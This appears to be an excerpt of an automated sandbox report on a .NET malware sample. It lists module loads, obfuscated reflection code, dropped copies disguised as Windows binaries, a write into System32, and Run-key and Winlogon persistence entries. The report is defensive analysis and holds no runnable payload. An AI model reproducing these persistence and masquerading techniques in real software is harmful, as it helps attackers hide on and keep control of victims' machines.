                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: mscoree.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: apphelp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: version.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: wldp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: profapi.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: mscoree.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: version.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: wldp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: profapi.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: version.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: wldp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: profapi.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: version.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: wldp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: profapi.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ktmw32.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wbemcomn.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: iphlpapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dnsapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winnsi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasapi32.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasman.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rtutils.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mswsock.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winhttp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasadhlp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: fwpuclnt.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmm.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmmbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mmdevapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: devobj.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ksuser.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Directory created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Directory created: C:\Program Files\Windows Portable Devices\eddb19405b7ce1
                              Source: s5duotgoYD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: s5duotgoYD.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: s5duotgoYD.exe Static file information: File size 1991680 > 1048576
                              Source: s5duotgoYD.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1e5c00
                              Source: s5duotgoYD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.pdb source: s5duotgoYD.exe, 00000000.00000002.1759280751.000000000382F000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.cs .Net Code: Type.GetTypeFromHandle(s9EvaYRMUEYQ1w4odie.HUu17KAIOqu(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(s9EvaYRMUEYQ1w4odie.HUu17KAIOqu(16777245)),Type.GetTypeFromHandle(s9EvaYRMUEYQ1w4odie.HUu17KAIOqu(16777259))})
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Code function: 0_2_00007FFD9B7E479C push esi; iretd 0_2_00007FFD9B7E479F
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Code function: 0_2_00007FFD9B7E421E push cs; ret 0_2_00007FFD9B7E421F
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Code function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
                              Source: C:\Recovery\RuntimeBroker.exe Code function: 50_2_00007FFD9B7D479C push esi; iretd 50_2_00007FFD9B7D479F
                              Source: C:\Recovery\RuntimeBroker.exe Code function: 50_2_00007FFD9B7D421E push cs; ret 50_2_00007FFD9B7D421F
                              Source: C:\Recovery\RuntimeBroker.exe Code function: 50_2_00007FFD9B7D00AD pushad ; iretd 50_2_00007FFD9B7D00C1
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe Code function: 55_2_00007FFD9B7F479C push esi; iretd 55_2_00007FFD9B7F479F
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe Code function: 55_2_00007FFD9B7F421E push cs; ret 55_2_00007FFD9B7F421F
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe Code function: 55_2_00007FFD9B7F00AD pushad ; iretd 55_2_00007FFD9B7F00C1
                              Source: s5duotgoYD.exe Static PE information: section name: .text entropy: 7.556185144032018
                              Source: backgroundTaskHost.exe.0.dr Static PE information: section name: .text entropy: 7.556185144032018
                              Source: xKVBpkhCEjg.exe.0.dr Static PE information: section name: .text entropy: 7.556185144032018
                              Source: conhost.exe.0.dr Static PE information: section name: .text entropy: 7.556185144032018
                              Source: xKVBpkhCEjg.exe0.0.dr Static PE information: section name: .text entropy: 7.556185144032018
                              Source: s5duotgoYD.exe (multiple .cs classes) High entropy of concatenated method names

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\s5duotgoYD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe Executable created and started: C:\Windows\ModemLogs\conhost.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Users\user\Desktop\kZSUvzow.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Users\user\Desktop\vNwKfKje.log
                              Source: C:\Recovery\RuntimeBroker.exe File created: C:\Users\user\Desktop\vlWcZFKy.log
                              Source: C:\Recovery\RuntimeBroker.exe File created: C:\Users\user\Desktop\SlQgWXuB.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Users\user\Desktop\vEZKvYQi.log
                              Source: C:\Recovery\RuntimeBroker.exe File created: C:\Users\user\Desktop\pkWDNnmN.log
                              Source: C:\Recovery\RuntimeBroker.exe File created: C:\Users\user\Desktop\WgRxdDkv.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Windows\ModemLogs\conhost.exe
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Recovery\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Users\user\Desktop\mjoVvRUx.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Recovery\xKVBpkhCEjg.exe
                              Source: C:\Recovery\RuntimeBroker.exe File created: C:\Users\user\Desktop\CjKcCUFn.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Users\user\Desktop\UAuXMqPf.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Windows\twain_32\xKVBpkhCEjg.exe
                              Source: C:\Recovery\RuntimeBroker.exe File created: C:\Users\user\Desktop\cZuWGjpj.log
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe File created: C:\Users\user\Desktop\XIsgiJJb.log

                              Boot Survival

                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run s5duotgoYD
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xKVBpkhCEjg
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run s5duotgoYD

                              Hooking and other Techniques for Hiding and Protection

                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\s5duotgoYD.exe; Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
